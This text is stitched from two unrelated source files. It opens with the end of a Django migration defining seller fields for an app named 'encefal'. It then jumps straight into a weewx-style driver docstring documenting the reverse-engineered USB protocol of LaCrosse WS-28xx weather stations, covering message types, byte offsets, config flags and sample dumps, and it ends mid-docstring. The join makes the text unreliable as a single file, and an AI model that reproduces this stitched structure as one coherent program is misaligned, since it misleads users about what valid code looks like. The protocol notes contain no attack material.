            'date_fin': ('django.db.models.fields.DateField', [], {}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'nom': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
        },
        u'encefal.vendeur': {
            'Meta': {'object_name': 'Vendeur'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'code_permanent': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '255'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'nom': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'prenom': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'telephone': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
        }
    }

    # Apps whose frozen models are complete in this migration.
    complete_apps = ['encefal']
# $Id$
# Copyright 2013 Matthew Wall
# See the file LICENSE.txt for your full rights.
#
# Thanks to Eddie De Pieri for the first Python implementation for WS-28xx.
# Eddie did the difficult work of decompiling HeavyWeather then converting
# and reverse engineering into a functional Python implementation.  Eddie's
# work was based on reverse engineering of HeavyWeather 2800 v 1.54
#
# Thanks to Lucas Heijst for enumerating the console message types and for
# debugging the transceiver/console communication timing issues.

"""Classes and functions for interfacing with WS-28xx weather stations.

LaCrosse makes a number of stations in the 28xx series, including:

  WS-2810, WS-2810U-IT
  WS-2811, WS-2811SAL-IT,  WS-2811BRN-IT,  WS-2811OAK-IT
  WS-2812, WS-2812U-IT
  WS-2813
  WS-2814, WS-2814U-IT
  WS-2815, WS-2815U-IT
  C86234

The station is also sold as the TFA Primus, TFA Opus, and TechnoLine.

HeavyWeather is the software provided by LaCrosse.

There are two versions of HeavyWeather for the WS-28xx series: 1.5.4 and 1.5.4b
Apparently there is a difference between TX59UN-1-IT and TX59U-IT models (this
identifier is printed on the thermo-hygro sensor).

   HeavyWeather Version    Firmware Version    Thermo-Hygro Model
   1.54                    333 or 332          TX59UN-1-IT
   1.54b                   288, 262, 222       TX59U-IT

HeavyWeather provides the following weather station settings:

  time display: 12|24 hour
  temperature display: C|F
  air pressure display: inhg|hpa
  wind speed display: m/s|knots|bft|km/h|mph
  rain display: mm|inch
  recording interval: 1m
  keep weather station in hi-speed communication mode: true/false

According to the HeavyWeatherPro User Manual (1.54, rev2), "Hi speed mode wears
down batteries on your display much faster, and similarly consumes more power
on the PC.  We do not believe most users need to enable this setting.  It was
provided at the request of users who prefer ultra-frequent uploads."

The HeavyWeatherPro 'CurrentWeather' view is updated as data arrive from the
console.  The console sends current weather data approximately every 13
seconds.

Historical data are updated less frequently - every 2 hours in the default
HeavyWeatherPro configuration.

According to the User Manual, "The 2800 series weather station uses the
'original' wind chill calculation rather than the 2001 'North American'
formula because the original formula is international."

Apparently the station console determines when data will be sent, and, once
paired, the transceiver is always listening.  The station console sends a
broadcast on the hour.  If the transceiver responds, the station console may
continue to broadcast data, depending on the transceiver response and the
timing of the transceiver response.

According to the C86234 Operations Manual (Revision 7):
 - Temperature and humidity data are sent to the console every 13 seconds.
 - Wind data are sent to the temperature/humidity sensor every 17 seconds.
 - Rain data are sent to the temperature/humidity sensor every 19 seconds.
 - Air pressure is measured every 15 seconds.

Each tip of the rain bucket is 0.26 mm of rain.

The following information was obtained by logging messages from the ws28xx.py
driver in weewx and by capturing USB messages between Heavy Weather Pro for
ws2800 and the TFA Primus Weather Station via windows program USB sniffer
busdog64_v0.2.1.

Pairing

The transceiver must be paired with a console before it can receive data.  Each
frame sent by the console includes the device identifier of the transceiver
with which it is paired.

Synchronizing

When the console and transceiver stop communicating, they can be synchronized
by one of the following methods:

- Push the SET button on the console
- Wait till the next full hour when the console sends a clock message

In each case a Request Time message is received by the transceiver from the
console. The 'Send Time to WS' message should be sent within a few
milliseconds (10 ms typical). The transceiver should handle the 'Time SET'
message then send a 'Time/Config written' message about 85 ms after the
'Send Time to WS' message.
When complete, the console and transceiver will have been synchronized.

Timing

Current Weather messages, History messages, getConfig/setConfig messages, and
setTime messages each have their own timing.  Missed History messages - as a
result of bad timing - result in console and transceiver becoming out of synch.

Current Weather

The console periodically sends Current Weather messages, each with the latest
values from the sensors.  The CommModeInterval determines how often the console
will send Current Weather messages.

History

The console records data periodically at an interval defined by the
HistoryInterval parameter.  The factory default setting is 2 hours.
Each history record contains a timestamp.  Timestamps use the time from the
console clock.  The console can record up to 1797 history records.

Reading 1795 history records took about 110 minutes on a raspberry pi, for
an average of 3.6 seconds per history record.

Reading 1795 history records took 65 minutes on a synology ds209+ii, for
an average of 2.2 seconds per history record.

Reading 1750 history records took 19 minutes using HeavyWeatherPro on a
Windows 7 64-bit laptop.

Message Types

The first byte of a message determines the message type.

ID   Type               Length

01   ?                  0x0f  (15)
d0   SetRX              0x15  (21)
d1   SetTX              0x15  (21)
d5   SetFrame           0x111 (273)
d6   GetFrame           0x111 (273)
d7   SetState           0x15  (21)
d8   SetPreamblePattern 0x15  (21)
d9   Execute            0x0f  (15)
dc   ReadConfigFlash<   0x15  (21)
dd   ReadConfigFlash>   0x15  (21)
de   GetState           0x0a  (10)
f0   WriteReg           0x05  (5)

In the following sections, some messages are decomposed using the following
structure:

  start   position in message buffer
  hi-lo   data starts on first (hi) or second (lo) nibble
  chars   data length in characters (nibbles)
  rem     remark
  name    variable

-------------------------------------------------------------------------------
1. 01 message (15 bytes)

000:  01 15 00 0b 08 58 3f 53 00 00   00 00 ff 15 0b (detected via USB sniffer)
000:  01 15 00 57 01 92 3f 53 00 00   00 00 ff 15 0a (detected via USB sniffer)

00:    messageID
02-15: ??

-------------------------------------------------------------------------------
2. SetRX message (21 bytes)

000:  d0 00 00 00 00 00 00 00 00 00   00 00 00 00 00 00 00 00 00 00
020:  00 
  
00:    messageID
01-20: 00

-------------------------------------------------------------------------------
3. SetTX message (21 bytes)

000: d1 00 00 00 00 00 00 00 00 00   00 00 00 00 00 00 00 00 00 00
020: 00 
  
00:    messageID
01-20: 00

-------------------------------------------------------------------------------
4. SetFrame message (273 bytes)

Action:
00: rtGetHistory - Ask for History message
01: rtSetTime    - Ask for Send Time to weather station message
02: rtSetConfig  - Ask for Send Config to weather station message
03: rtGetConfig  - Ask for Config message
05: rtGetCurrent - Ask for Current Weather message
c0: Send Time    - Send Time to WS
40: Send Config  - Send Config to WS

000:  d5 00 09 DevID 00 CfgCS cIntThisAdr xx xx xx  rtGetHistory 
000:  d5 00 09 DevID 01 CfgCS cIntThisAdr xx xx xx  rtReqSetTime
000:  d5 00 09 f0 f0 02 CfgCS cIntThisAdr xx xx xx  rtReqFirstConfig
000:  d5 00 09 DevID 02 CfgCS cIntThisAdr xx xx xx  rtReqSetConfig
000:  d5 00 09 DevID 03 CfgCS cIntThisAdr xx xx xx  rtGetConfig
000:  d5 00 09 DevID 05 CfgCS cIntThisAdr xx xx xx  rtGetCurrent
000:  d5 00 0c DevID c0 CfgCS [TimeData . .. .. ..  Send Time
000:  d5 00 30 DevID 40 CfgCS [ConfigData .. .. ..  Send Config

All SetFrame messages:
00:    messageID
01:    00
02:    Message Length (starting with next byte)
03-04: DeviceID           [DevID]
05:    Action
06-07: Config checksum    [CfgCS]

Additional bytes rtGetCurrent, rtGetHistory, rtSetTime messages:
08-09hi: ComInt             [cINT]    1.5 bytes (high byte first)
09lo-11: ThisHistoryAddress [ThisAdr] 2.5 bytes (high byte first)

Additional bytes Send Time message:
08:    seconds
09:    minutes
10:    hours
11hi:  DayOfWeek
11lo:  day_lo         (low byte)
12hi:  month_lo       (low byte)
12lo:  day_hi         (high byte)
13hi:  (year-2000)_lo (low byte)
13lo:  month_hi       (high byte)
14lo:  (year-2000)_hi (high byte)

-------------------------------------------------------------------------------
5. GetFrame message

Response type:
20: WS SetTime / SetConfig - Data written
40: GetConfig
60: Current Weather
80: Actual / Outstanding History
a1: Request First-Time Config
a2: Request SetConfig
a3: Request SetTime

000:  00 00 06 DevID 20 64 CfgCS xx xx xx xx xx xx xx xx xx  Time/Config written
000:  00 00 30 DevID 40 64 [ConfigData .. .. .. .. .. .. ..  GetConfig
000:  00 00 d7 DevID 60 64 CfgCS [CurData .. .. .. .. .. ..  Current Weather
000:  00 00 1e DevID 80 64 CfgCS 0LateAdr 0ThisAdr [HisData  Outstanding History
000:  00 00 1e DevID 80 64 CfgCS 0LateAdr 0ThisAdr [HisData  Actual History
000:  00 00 06 DevID a1 64 CfgCS xx xx xx xx xx xx xx xx xx  Request FirstConfig
000:  00 00 06 DevID a2 64 CfgCS xx xx xx xx xx xx xx xx xx  Request SetConfig
000:  00 00 06 DevID a3 64 CfgCS xx xx xx xx xx xx xx xx xx  Request SetTime

ReadConfig example:  
000: 01 2e 40 5f 36 53 02 00 00 00  00 81 00 04 10 00 82 00 04 20
020: 00 71 41 72 42 00 05 00 00 00  27 10 00 02 83 60 96 01 03 07
040: 21 04 01 00 00 00 CfgCS

WriteConfig example:
000: 01 2e 40 64 36 53 02 00 00 00  00 00 10 04 00 81 00 20 04 00
020: 82 41 71 42 72 00 00 05 00 00  00 10 27 01 96 60 83 02 01 04
040: 21 07 03 10 00 00 CfgCS

00:    messageID
01:    00
02:    Message Length (starting with next byte)
03-04: DeviceID [devID]
05hi:  responseType
06:    Quality (in steps of 5)

Additional byte GetFrame messages except Request SetConfig and Request SetTime:
05lo:  BatteryStat 8=WS bat low; 4=TMP bat low; 2=RAIN bat low; 1=WIND bat low

Additional byte Request SetConfig and Request SetTime:
05lo:  RequestID

Additional bytes all GetFrame messages except ReadConfig and WriteConfig
07-08: Config checksum [CfgCS]

Additional bytes Outstanding History:
09lo-11: LatestHistoryAddress [LateAdr] 2.5 bytes (Latest to sent)
12lo-14: ThisHistoryAddress   [ThisAdr] 2.5 bytes (Outstanding)

Additional bytes Actual History:
09lo-11: LatestHistoryAddress [ThisAdr] 2.5 bytes (LatestHistoryAddress is the)
12lo-14: ThisHistoryAddress   [ThisAdr] 2.5 bytes (same as ThisHistoryAddress)

Additional bytes ReadConfig and WriteConfig
43-45: ResetMinMaxFlags (Output only; not included in checksum calculation)
46-47: Config checksum [CfgCS] (CheckSum = sum of bytes (00-42) + 7)

-------------------------------------------------------------------------------
6. SetState message

000:  d7 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00:    messageID
01-14: 00

-------------------------------------------------------------------------------
7. SetPreamblePattern message

000:  d8 aa 00 00 00 00 00 00 00 00 00 00 00 00 00

00:    messageID
01:    ??
02-14: 00

-------------------------------------------------------------------------------
8. Execute message

000:  d9 05 00 00 00 00 00 00 00 00 00 00 00 00 00

00:    messageID
01:    ??
02-14: 00

-------------------------------------------------------------------------------
9. ReadConfigFlash in - receive data

000: dc 0a 01 f5 00 01 78 a0 01 02  0a 0c 0c 01 2e ff ff ff ff ff - freq correction
000: dc 0a 01 f9 01 02 0a 0c 0c 01  2e ff ff ff ff ff ff ff ff ff - transceiver data

00:    messageID
01:    length
02-03: address

Additional bytes frequency correction
05lo-07hi: frequency correction

Additional bytes transceiver data
05-10:     serial number
09-10:     DeviceID [devID]

-------------------------------------------------------------------------------
10. ReadConfigFlash out - ask for data

000: dd 0a 01 f5 cc cc cc cc cc cc  cc cc cc cc cc - Ask for freq correction
000: dd 0a 01 f9 cc cc cc cc cc cc  cc cc cc cc cc - Ask for transceiver data

00:    messageID
01:    length
02-03: address
04-14: cc

-------------------------------------------------------------------------------
11. GetState message

000:  de 14 00 00 00 00 (between SetPreamblePattern and first de16 message)
000:  de 15 00 00 00 00 Idle message
000:  de 16 00 00 00 00 Normal message
000:  de 0b 00 00 00 00 (detected via USB sniffer)

00:    messageID
01:    stateID
02-05: 00

-------------------------------------------------------------------------------
12. WriteReg message

000: f0 08 01 00 00 - AX5051RegisterNames.IFMODE
000: f0 10 01 41 00 - AX5051RegisterNames.MODULATION
000: f0 11 01 07 00 - AX5051RegisterNames.ENCODING
...
000: f0 7b 01 88 00 - AX5051RegisterNames.TXRATEMID 
000: f0 7c 01 23 00 - AX5051RegisterNames.TXRATELO
000: f0 7d 01 35 00 - AX5051RegisterNames.TXDRIVER

00:    messageID
01:    register address
02:    01
03:    AX5051RegisterName
04:    00

-------------------------------------------------------------------------------
13. Current Weather message

start  hi-lo  chars  rem  name
0      hi     4           DevID
2      hi     2           Action
3      hi     2           Quality
4      hi     4           DeviceCS
6      hi     4      6    _AlarmRingingFlags
8      hi     1           _WeatherTendency
8      lo     1           _WeatherState
9      hi     1           not used
9      lo     10          _TempIndoorMinMax._Max._Time
14     lo     10          _TempIndoorMinMax._Min._Time
19     lo     5           _TempIndoorMinMax._Max._Value
22     hi     5           _TempIndoorMinMax._Min._Value
24     lo     5           _TempIndoor                           (C)
27     lo     10          _TempOutdoorMinMax._Max._Time
32     lo     10          _TempOutdoorMinMax._Min._Time
37     lo     5           _TempOutdoorMinMax._Max._Value
40     hi     5           _TempOutdoorMinMax._Min._Value
42     lo     5           _TempOutdoor                          (C)
45     hi     1           not used
45     lo     10     1    _WindchillMinMax._Max._Time
50     lo     10     2    _WindchillMinMax._Min._Time
55     lo     5      1    _WindchillMinMax._Max._Value
57     hi     5      1    _WindchillMinMax._Min._Value
60     lo     6           _Windchill                            (C)
63     hi     1           not used
63     lo     10          _DewpointMinMax._Max._Time
68     lo     10          _DewpointMinMax._Min._Time
73     lo     5           _DewpointMinMax._Max._Value
76     hi     5           _DewpointMinMax._Min._Value
78     lo     5           _Dewpoint                             (C)
81     hi     10          _HumidityIndoorMinMax._Max._Time
86     hi     10          _HumidityIndoorMinMax._Min._Time
91     hi     2           _HumidityIndoorMinMax._Max._Value
92     hi     2           _HumidityIndoorMinMax._Min._Value
93     hi     2           _HumidityIndoor                       (%)
94     hi     10          _HumidityOutdoorMinMax._Max._Time
99     hi     10          _HumidityOutdoorMinMax._Min._Time
104    hi     2           _HumidityOutdoorMinMax._Max._Value
105    hi     2           _HumidityOutdoorMinMax._Min._Value
106    hi     2           _HumidityOutdoor                      (%)
107    hi     10     3    _RainLastMonthMax._Time
112    hi     6      3    _RainLastMonthMax._Max._Value
115    hi     6           _RainLastMonth                        (mm)
118    hi     10     3    _RainLastWeekMax._Time
123    hi     6      3    _RainLastWeekMax._Max._Value
126    hi     6           _RainLastWeek                         (mm)
129    hi     10          _Rain24HMax._Time
134    hi     6           _Rain24HMax._Max._Value
137    hi     6           _Rain24H                              (mm)
140    hi     10          _Rain1HMax._Time
145    hi     6           _Rain1HMax._Max._Value
148    hi     6           _Rain1H                               (mm)
151    hi     1           not used
152    lo     10          _LastRainReset
158    lo     7           _RainTotal                            (mm)
160    hi     1           _WindDirection5
160    lo     1           _WindDirection4
161    hi     1           _WindDirection3
161    lo     1           _WindDirection2
162    hi     1           _WindDirection1
162    lo     1           _WindDirection                        (0-15)
163    hi     18          unknown data
172    hi     6           _WindSpeed                            (km/h)
175    hi     1           _GustDirection5
175    lo     1           _GustDirection4
176    hi     1           _GustDirection3
176    lo     1           _GustDirection2
177    hi     1           _GustDirection1
177    lo     1           _GustDirection                        (0-15)
178    hi     2           not used
179    hi     10          _GustMax._Max._Time
184    hi     6           _GustMax._Max._Value
187    hi     6           _Gust                                 (km/h)
190    hi     10     4    _PressureRelative_MinMax._Max/Min._Time
195    hi     5      5    _PressureRelative_inHgMinMax._Max._Value
197    lo     5      5    _PressureRelative_hPaMinMax._Max._Value
200    hi     5           _PressureRelative_inHgMinMax._Max._Value
202    lo     5           _PressureRelative_hPaMinMax._Max._Value
205    hi     5           _PressureRelative_inHgMinMax._Min._Value
207    lo     5           _PressureRelative_hPaMinMax._Min._Value
210    hi     5           _PressureRelative_inHg
212    lo     5           _PressureRelative_hPa

214    lo     430         end

Remarks
  1 since factory reset
  2 since software reset
  3 not used?
  4 should be: _PressureRelative_MinMax._Max._Time
  5 should be: _PressureRelative_MinMax._Min._Time
  6 _AlarmRingingFlags (values in hex)
    80 00 = Hi Al Gust
    40 00 = Al WindDir
    20 00 = One or more WindDirs set
    10 00 = Hi Al Rain24H
    08 00 = Hi Al Outdoor Humidity
    04 00 = Lo Al Outdoor Humidity
    02 00 = Hi Al Indoor Humidity
    01 00 = Lo Al Indoor Humidity
    00 80 = Hi Al Outdoor Temp
    00 40 = Lo Al Outdoor Temp
    00 20 = Hi Al Indoor Temp
    00 10 = Lo Al Indoor Temp
    00 08 = Hi Al Pressure
    00 04 = Lo Al Pressure
    00 02 = not used
    00 01 = not used

-------------------------------------------------------------------------------
14. History Message

start  hi-lo  chars  rem  name
0      hi     4           DevID
2      hi     2           Action
3      hi     2           Quality          (%)
4      hi     4           DeviceCS
6      hi     6           LatestAddress
9      hi     6           ThisAddress
12     hi     1           not used
12     lo     3           Gust             (m/s)
14     hi     1           WindDirection    (0-15, also GustDirection)
14     lo     3           WindSpeed        (m/s)
16     hi     3           RainCounterRaw   (total in period in 0.1 inch)
17     lo     2           HumidityOutdoor  (%)
18     lo     2           HumidityIndoor   (%)
19     lo     5           PressureRelative (hPa)
22     hi     3           TempOutdoor      (C)
23     lo     3           TempIndoor       (C)
25     hi     10          Time

29     lo     60   end

-------------------------------------------------------------------------------
15. Set Config Message

start  hi-lo  chars  rem  name
0      hi     4           DevID
2      hi     2           Action
3      hi     2           Quality
4      hi     1       1   _WindspeedFormat
4      lo     0,25    2   _RainFormat
4      lo     0,25    3   _PressureFormat
4      lo     0,25    4   _TemperatureFormat
4      lo     0,25    5   _ClockMode
5      hi     1           _WeatherThreshold
5      lo     1           _StormThreshold
6      hi     1           _LowBatFlags
6      lo     1       6   _LCDContrast
7      hi     4       7   _WindDirAlarmFlags (reverse group 1)
9      hi     4       8   _OtherAlarmFlags   (reverse group 1)
11     hi     10          _TempIndoorMinMax._Min._Value (reverse group 2)
                          _TempIndoorMinMax._Max._Value (reverse group 2)
16     hi     10          _TempOutdoorMinMax._Min._Value (reverse group 3)
                          _TempOutdoorMinMax._Max._Value (reverse group 3)
21     hi     2           _HumidityIndoorMinMax._Min._Value
22     hi     2           _HumidityIndoorMinMax._Max._Value
23     hi     2           _HumidityOutdoorMinMax._Min._Value
24     hi     2           _HumidityOutdoorMinMax._Max._Value
25     hi     1           not used
25     lo     7           _Rain24HMax._Max._Value (reverse bytes)
29     hi     2           _HistoryInterval
30     hi     1           not used
30     lo     5           _GustMax._Max._Value (reverse bytes)
33     hi     10          _PressureRelative_hPaMinMax._Min._Value (rev grp4)
                          _PressureRelative_inHgMinMax._Min._Value(rev grp4)
38     hi     10          _PressureRelative_hPaMinMax._Max._Value (rev grp5)
                          _PressureRelative_inHgMinMax._Max._Value(rev grp5)
43     hi     6       9   _ResetMinMaxFlags
46     hi     4       10  _InBufCS

47     lo     96          end

Remarks 
  1 0=m/s 1=knots 2=bft 3=km/h 4=mph
  2 0=mm   1=inch
  3 0=inHg 2=hPa
  4 0=F    1=C
  5 0=24h  1=12h
  6 values 0-7 => LCD contrast 1-8
  7 WindDir Alarms (not-reversed values in hex)
    80 00 = NNW
    40 00 = NW
    20 00 = WNW
    10 00 = W
    08 00 = WSW
    04 00 = SW
    02 00 = SSW
    01 00 = S
    00 80 = SSE
    00 40 = SE
    00 20 = ESE
    00 10 = E
    00 08 = ENE
    00 04 = NE
    00 02 = NNE
    00 01 = N
  8 Other Alarms (not-reversed values in hex)
    80 00 = Hi Al Gust
    40 00 = Al WindDir
    20 00 = One or more WindDirs set
    10 00 = Hi Al Rain24H
    08 00 = Hi Al Outdoor Humidity
    04 00 = Lo Al Outdoor Humidity
    02 00 = Hi Al Indoor Humidity
    01 00 = Lo Al Indoor Humidity
    00 80 = Hi Al Outdoor Temp
    00 40 = Lo Al Outdoor Temp
    00 20 = Hi Al Indoor Temp
    00 10 = Lo Al Indoor Temp
    00 08 = Hi Al Pressure
    00 04 = Lo Al Pressure
    00 02 = not used
    00 01 = not used
  9 ResetMinMaxFlags (not-reversed values in hex)
    "Output only; not included in checksum calc"
    80 00 00 =  Reset DewpointMax
    40 00 00 =  Reset DewpointMin
    20 00 00 =  not used
    10 00 00 =  Reset WindchillMin*
    "*Reset dateTime only; Min._Value is preserved"
    08 00 00 =  Reset TempOutMax
    04 00 00 =  Reset TempOutMin
    02 00 00 =  Reset TempInMax
    01 00 00 =  Reset TempInMin
    00 80 00 =  Reset Gust
    00 40 00 =  not used
    00 20 00 =  not used
    00 10 00 =  not used
    00 08 00 =  Reset HumOutMax
    00 04 00 =  Reset HumOutMin
    00 02 00 =  Reset HumInMax
    00 01 00 =  Reset HumInMin
    00 00 80 =  not used
    00 00 40 =  Reset Rain Total
    00 00 20 =  Reset last month?
    00 00 10 =  Reset lastweek?
    00 00 08 =  Reset Rain24H
    00 00 04 =  Reset Rain1H
    00 00 02 =  Reset PresRelMax
    00 00 01 =  Reset PresRelMin
  10 Checksum = sum bytes (0-42) + 7 

-------------------------------------------------------------------------------
16. Get Config Message

start  hi-lo  chars  rem  name
0      hi     4           DevID
2      hi     2           Action
3      hi     2           Quality
4      hi     1      1    _WindspeedFormat
4      lo     0,25   2    _RainFormat
4      lo     0,25   3    _PressureFormat
4      lo     0,25   4    _TemperatureFormat
4      lo     0,25   5    _ClockMode
5      hi     1           _WeatherThreshold
5      lo     1           _StormThreshold
6      hi     1           _LowBatFlags
6      lo     1      6    _LCDContrast
7      hi     4      7    _WindDirAlarmFlags
9      hi     4      8    _OtherAlarmFlags
11     hi     5           _TempIndoorMinMax._Min._Value
13     lo     5           _TempIndoorMinMax._Max._Value
16     hi     5           _TempOutdoorMinMax._Min._Value
18     lo     5           _TempOutdoorMinMax._Max._Value
21     hi     2           _HumidityIndoorMinMax._Max._Value
22     hi     2           _HumidityIndoorMinMax._Min._Value
23     hi     2           _HumidityOutdoorMinMax._Max._Value
24     hi     2           _HumidityOutdoorMinMax._Min._Value
25     hi     1           not used
25     lo     7           _Rain24HMax._Max._Value
29     hi     2           _HistoryInterval
30     hi     5           _GustMax._Max._Value
32     lo     1           not used
33     hi     5           _PressureRelative_hPaMinMax._Min._Value
35     lo     5           _PressureRelative_inHgMinMax._Min._Value
38     hi     5           _PressureRelative_hPaMinMax._Max._Value
40     lo     5           _PressureRelative_inHgMinMax._Max._Value
43     hi     6      9    _ResetMinMaxFlags
46     hi     4      10   _InBufCS

47     lo     96          end

Remarks
  1 0=m/s 1=knots 2=bft 3=km/h 4=mph
  2 0=mm   1=inch
  3 0=inHg 1=hPa
  4 0=F    1=C
  5 0=24h  1=12h
  6 values 0-7 => LCD contrast 1-8
  7 WindDir Alarms (values in hex)
    80 00 = NNW
    40 00 = NW
    20 00 = WNW
    10 00 = W
    08 00 = WSW
    04 00 = SW
    02 00 = SSW
    01 00 = S
    00 80 = SSE
    00 40 = SE
    00 20 = ESE
    00 10 = E
    00 08 = ENE
    00 04 = NE
    00 02 = NNE
    00 01 = N
  8 Other Alarms (values in hex)
    80 00 = Hi Al Gust
    40 00 = Al WindDir
    20 00 = One or more WindDirs set
    10 00 = Hi Al Rain24H
    08 00 = Hi Al Outdoor Humidity
    04 00 = Lo Al Outdoor Humidity
    02 00 = Hi Al Indoor Humidity
    01 00 = Lo Al Indoor Humidity
    00 80 = Hi Al Outdoor Temp
    00 40 = Lo Al Outdoor Temp
    00 20 = Hi Al Indoor Temp
    00 10 = Lo Al Indoor Temp
    00 08 = Hi Al Pressure
    00 04 = Lo Al Pressure
    00 02 = not used
    00 01 = not used
  9 ResetMinMaxFlags (values in hex)
    "Output only; input =  00 00 00"
  10 Checksum = sum bytes (0-42) + 7 


-------------------------------------------------------------------------------
Examples of messages

readCurrentWeather
Cur   000: 01 2e 60 5f 05 1b 00 00 12 01  30 62 21 54 41 30 62 40 75 36  
Cur   020: 59 00 60 70 06 35 00 01 30 62  31 61 21 30 62 30 55 95 92 00  
Cur   040: 53 10 05 37 00 01 30 62 01 90  81 30 62 40 90 66 38 00 49 00  
Cur   060: 05 37 00 01 30 62 21 53 01 30  62 22 31 75 51 11 50 40 05 13  
Cur   080: 80 13 06 22 21 40 13 06 23 19  37 67 52 59 13 06 23 06 09 13  
Cur   100: 06 23 16 19 91 65 86 00 00 00  00 00 00 00 00 00 00 00 00 00  
Cur   120: 00 00 00 00 00 00 00 00 00 13  06 23 09 59 00 06 19 00 00 51  
Cur   140: 13 06 22 20 43 00 01 54 00 00  00 01 30 62 21 51 00 00 38 70  
Cur   160: a7 cc 7b 50 09 01 01 00 00 00  00 00 00 fc 00 a7 cc 7b 14 13  
Cur   180: 06 23 14 06 0e a0 00 01 b0 00  13 06 23 06 34 03 00 91 01 92  
Cur   200: 03 00 91 01 92 02 97 41 00 74  03 00 91 01 92
 
WeatherState: Sunny(Good)  WeatherTendency: Rising(Up)  AlarmRingingFlags: 0000
TempIndoor      23.500 Min:20.700 2013-06-24 07:53 Max:25.900 2013-06-22 15:44
HumidityIndoor  59.000 Min:52.000 2013-06-23 19:37 Max:67.000 2013-06-22 21:40
TempOutdoor     13.700 Min:13.100 2013-06-23 05:59 Max:19.200 2013-06-23 16:12
HumidityOutdoor 86.000 Min:65.000 2013-06-23 16:19 Max:91.000 2013-06-23 06:09
Windchill       13.700 Min: 9.000 2013-06-24 09:06 Max:23.800 2013-06-20 19:08
Dewpoint        11.380 Min:10.400 2013-06-22 23:17 Max:15.111 2013-06-22 15:30
WindSpeed        2.520
Gust             4.320                             Max:37.440 2013-06-23 14:06
WindDirection    WSW    GustDirection    WSW
WindDirection1   SSE    GustDirection1   SSE
WindDirection2     W    GustDirection2     W
WindDirection3     W    GustDirection3     W
WindDirection4   SSE    GustDirection4   SSE
WindDirection5    SW    GustDirection5    SW
RainLastMonth    0.000                             Max: 0.000 1900-01-01 00:00
RainLastWeek     0.000                             Max: 0.000 1900-01-01 00:00
Rain24H          0.510                             Max: 6.190 2013-06-23 09:59
Rain1H           0.000                             Max: 1.540 2013-06-22 20:43
RainTotal        3.870                    LastRainReset       2013-06-22 15:10
PresRelhPa 1019.200 Min:1007.400 2013-06-23 06:34 Max:1019.200 2013-06-23 06:34
PresRel_inHg 30.090 Min:  29.740 2013-06-23 06:34 Max:  30.090 2013-06-23 06:34
Bytes with unknown meaning at 157-165: 50 09 01 01 00 00 00 00 00 

-------------------------------------------------------------------------------
readHistory
His   000: 01 2e 80 5f 05 1b 00 7b 32 00  7b 32 00 0c 70 0a 00 08 65 91  
His   020: 01 92 53 76 35 13 06 24 09 10 
 
Time           2013-06-24 09:10:00
TempIndoor=          23.5
HumidityIndoor=        59
TempOutdoor=         13.7
HumidityOutdoor=       86
PressureRelative=  1019.2
RainCounterRaw=       0.0
WindDirection=        SSE
WindSpeed=            1.0
Gust=                 1.2

-------------------------------------------------------------------------------
readConfig
In   000: 01 2e 40 5f 36 53 02 00 00 00  00 81 00 04 10 00 82 00 04 20  
In   020: 00 71 41 72 42 00 05 00 00 00  27 10 00 02 83 60 96 01 03 07  
In   040: 21 04 01 00 00 00 05 1b

-------------------------------------------------------------------------------
writeConfig
Out  000: 01 2e 40 64 36 53 02 00 00 00  00 00 10 04 00 81 00 20 04 00  
Out  020: 82 41 71 42 72 00 00 05 00 00  00 10 27 01 96 60 83 02 01 04  
Out  040: 21 07 03 10 00 00 05 1b 

OutBufCS=             051b
ClockMode=            0
TemperatureFormat=    1
PressureFormat=       1
RainFormat=           0
WindspeedFormat=      3
WeatherThreshold=     3
StormThreshold=       5
LCDContrast=          2
LowBatFlags=          0
WindDirAlarmFlags=    0000
OtherAlarmFlags=      0000
HistoryInterval=      0
TempIndoor_Min=       1.0
TempIndoor_Max=       41.0
TempOutdoor_Min=      2.0
TempOutdoor_Max=      42.0
HumidityIndoor_Min=   41
HumidityIndoor_Max=   71
HumidityOutdoor_Min=  42
HumidityOutdoor_Max=  72
Rain24HMax=           50.0
GustMax=              100.0
PressureRel_hPa_Min=  960.1
PressureRel_inHg_Min= 28.36
PressureRel_hPa_Max=  1040.1
PressureRel_inHg_Max= 30.72
ResetMinMaxFlags=     100000 (Output only; Input always 00 00 00)

-------------------------------------------------------------------------------
class EHistoryInterval:
Constant  Value Message received at
hi01Min   = 0   00:00, 00:01, 00:02, 00:03 ... 23:59
hi05Min   = 1   00:00, 00:05, 00:10, 00:15 ... 23:55
hi10Min   = 2   00:00, 00:10, 00:20, 00:30 ... 23:50
hi15Min   = 3   00:00, 00:15, 00:30, 00:45 ... 23:45
hi20Min   = 4   00:00, 00:20, 00:40, 01:00 ... 23:40
hi30Min   = 5   00:00, 00:30, 01:00, 01:30 ... 23:30
hi60Min   = 6   00:00, 01:00, 02:00, 03:00 ... 23:00
hi02Std   = 7   00:00, 02:00, 04:00, 06:00 ... 22:00
hi04Std   = 8   00:00, 04:00, 08:00, 12:00 ... 20:00
hi06Std   = 9   00:00, 06:00, 12:00, 18:00
hi08Std   = 0xA 00:00, 08:00, 16:00
hi12Std   = 0xB 00:00, 12:00
hi24Std   = 0xC 00:00

-------------------------------------------------------------------------------
WS SetTime - Send time to WS
Time  000: 01 2e c0 05 1b 19 14 12 40 62  30 01
time sent: 2013-06-24 12:14:19 

-------------------------------------------------------------------------------
ReadConfigFlash data

Ask for frequency correction 
rcfo  000: dd 0a 01 f5 cc cc cc cc cc cc  cc cc cc cc cc

readConfigFlash frequency correction
rcfi  000: dc 0a 01 f5 00 01 78 a0 01 02  0a 0c 0c 01 2e ff ff ff ff ff
frequency correction: 96416 (0x178a0)
adjusted frequency: 910574957 (3646456d)

Ask for transceiver data 
rcfo  000: dd 0a 01 f9 cc cc cc cc cc cc  cc cc cc cc cc

